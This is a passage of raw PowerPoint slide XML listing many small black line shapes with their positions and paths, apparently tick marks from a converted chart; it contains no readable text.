          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="object 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7812125" y="1840463"/>
            <a:ext cx="367438" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="185420">
                <a:moveTo>
                  <a:pt x="184942" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="object 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7812125" y="1840463"/>
            <a:ext cx="0" cy="85568"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="43180">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="43042"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="object 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1240944" y="5732073"/>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50" name="object 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1296155" y="5731802"/>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51" name="object 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1296154" y="5731803"/>
            <a:ext cx="0" cy="1258"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="635">
                <a:moveTo>
                  <a:pt x="-2706" y="138"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="138"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="object 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1324063" y="5732073"/>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53" name="object 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1351915" y="5731802"/>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54" name="object 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1351914" y="5731803"/>
            <a:ext cx="0" cy="1258"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="635">
                <a:moveTo>
                  <a:pt x="-2706" y="138"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="138"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="object 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1379820" y="5732073"/>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56" name="object 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407674" y="5731802"/>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57" name="object 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407673" y="5731803"/>
            <a:ext cx="0" cy="1258"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="635">
                <a:moveTo>
                  <a:pt x="-2706" y="138"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="138"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="object 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1435580" y="5731802"/>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59" name="object 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1435579" y="5731803"/>
            <a:ext cx="0" cy="1258"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="635">
                <a:moveTo>
                  <a:pt x="-2706" y="138"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="138"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="object 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1462939" y="5731802"/>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61" name="object 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1462938" y="5731803"/>
            <a:ext cx="0" cy="1258"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="635">
                <a:moveTo>
                  <a:pt x="-2706" y="138"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="138"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="object 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1490791" y="5731542"/>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63" name="object 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1490790" y="5731254"/>
            <a:ext cx="0" cy="1258"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="635">
                <a:moveTo>
                  <a:pt x="-2706" y="276"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="276"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="object 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1518698" y="5731802"/>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65" name="object 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1518697" y="5731803"/>
            <a:ext cx="0" cy="1258"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="635">
                <a:moveTo>
                  <a:pt x="-2706" y="138"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="138"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="object 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1546604" y="5731542"/>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67" name="object 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1546603" y="5731254"/>
            <a:ext cx="0" cy="1258"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="635">
                <a:moveTo>
                  <a:pt x="-2706" y="276"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="276"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="object 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1574456" y="5731802"/>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69" name="object 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1574455" y="5731803"/>
            <a:ext cx="0" cy="1258"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="635">
                <a:moveTo>
                  <a:pt x="-2706" y="138"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="138"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="object 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1602362" y="5731802"/>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71" name="object 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1602361" y="5731803"/>
            <a:ext cx="0" cy="1258"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="635">
                <a:moveTo>
                  <a:pt x="-2706" y="138"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="138"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="object 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1629722" y="5731542"/>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73" name="object 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1629721" y="5731254"/>
            <a:ext cx="0" cy="1258"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="635">
                <a:moveTo>
                  <a:pt x="-2706" y="276"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="276"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="object 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1657575" y="5731802"/>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75" name="object 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1657573" y="5731803"/>
            <a:ext cx="0" cy="1258"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="635">
                <a:moveTo>
                  <a:pt x="-2706" y="138"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="138"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="object 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1685480" y="5731802"/>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77" name="object 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1685479" y="5731803"/>
            <a:ext cx="0" cy="1258"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="635">
                <a:moveTo>
                  <a:pt x="-2706" y="138"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="138"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="object 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1713334" y="5732073"/>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79" name="object 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1741240" y="5731542"/>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80" name="object 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1741239" y="5731254"/>
            <a:ext cx="0" cy="1258"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="635">
                <a:moveTo>
                  <a:pt x="-2706" y="276"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="276"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="object 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1769146" y="5731271"/>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82" name="object 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1769144" y="5730706"/>
            <a:ext cx="0" cy="2517"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1269">
                <a:moveTo>
                  <a:pt x="-2706" y="414"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="414"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="object 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1796451" y="5731007"/>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84" name="object 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1796450" y="5730159"/>
            <a:ext cx="0" cy="2517"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1269">
                <a:moveTo>
                  <a:pt x="-2706" y="552"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="552"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="object 85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1824358" y="5729666"/>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86" name="object 86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1824357" y="5727478"/>
            <a:ext cx="0" cy="5033"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="2539">
                <a:moveTo>
                  <a:pt x="-2706" y="1228"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1228"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="object 87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1852264" y="5729119"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3258">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="object 88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1852263" y="5726438"/>
            <a:ext cx="0" cy="6292"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3175">
                <a:moveTo>
                  <a:pt x="-2706" y="1491"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1491"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="object 89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880116" y="5728861"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3507">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="object 90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880115" y="5725891"/>
            <a:ext cx="0" cy="7550"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3810">
                <a:moveTo>
                  <a:pt x="-2706" y="1629"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1629"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3258">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="object 91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1908022" y="5727521"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="4860">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
